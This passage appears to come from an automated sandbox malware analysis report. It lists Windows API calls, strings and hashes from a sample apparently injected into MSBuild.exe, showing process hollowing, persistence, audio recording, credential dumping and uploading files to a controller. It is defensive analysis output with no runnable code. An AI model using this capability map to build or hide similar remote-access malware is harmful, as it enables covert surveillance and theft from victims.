                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 4188446516-3035715614
                                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                • API String ID: 4250697656-2665858469
                                                                                                • Opcode ID: b78e1228bfcf1152717d4e06b96b9f654a8980d279fc97c9c1fd34a995d97097
                                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                • Opcode Fuzzy Hash: b78e1228bfcf1152717d4e06b96b9f654a8980d279fc97c9c1fd34a995d97097
                                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                • API String ID: 738084811-1408154895
                                                                                                • Opcode ID: c8874a4ef884f592fa1caa418ba264597b3d04ee3cf373917ff04b4681717e95
                                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                • Opcode Fuzzy Hash: c8874a4ef884f592fa1caa418ba264597b3d04ee3cf373917ff04b4681717e95
                                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-89630625
                                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                                                                • API String ID: 1579085052-1088133900
                                                                                                • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                • Opcode Fuzzy Hash: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                • API String ID: 1223786279-3931108886
                                                                                                • Opcode ID: 57ee07ea57e2786759881091ef8f4255660d87c0fdec43e829bbe04dac016576
                                                                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                • Opcode Fuzzy Hash: 57ee07ea57e2786759881091ef8f4255660d87c0fdec43e829bbe04dac016576
                                                                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                • API String ID: 1884690901-3066803209
                                                                                                • Opcode ID: c80ebbadcd18372f13a2498dc9f3057d2416bdf8da610c359471f90a3c4fc21e
                                                                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                • Opcode Fuzzy Hash: c80ebbadcd18372f13a2498dc9f3057d2416bdf8da610c359471f90a3c4fc21e
                                                                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                • _free.LIBCMT ref: 004500A6
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 004500C8
                                                                                                • _free.LIBCMT ref: 004500DD
                                                                                                • _free.LIBCMT ref: 004500E8
                                                                                                • _free.LIBCMT ref: 0045010A
                                                                                                • _free.LIBCMT ref: 0045011D
                                                                                                • _free.LIBCMT ref: 0045012B
                                                                                                • _free.LIBCMT ref: 00450136
                                                                                                • _free.LIBCMT ref: 0045016E
                                                                                                • _free.LIBCMT ref: 00450175
                                                                                                • _free.LIBCMT ref: 00450192
                                                                                                • _free.LIBCMT ref: 004501AA
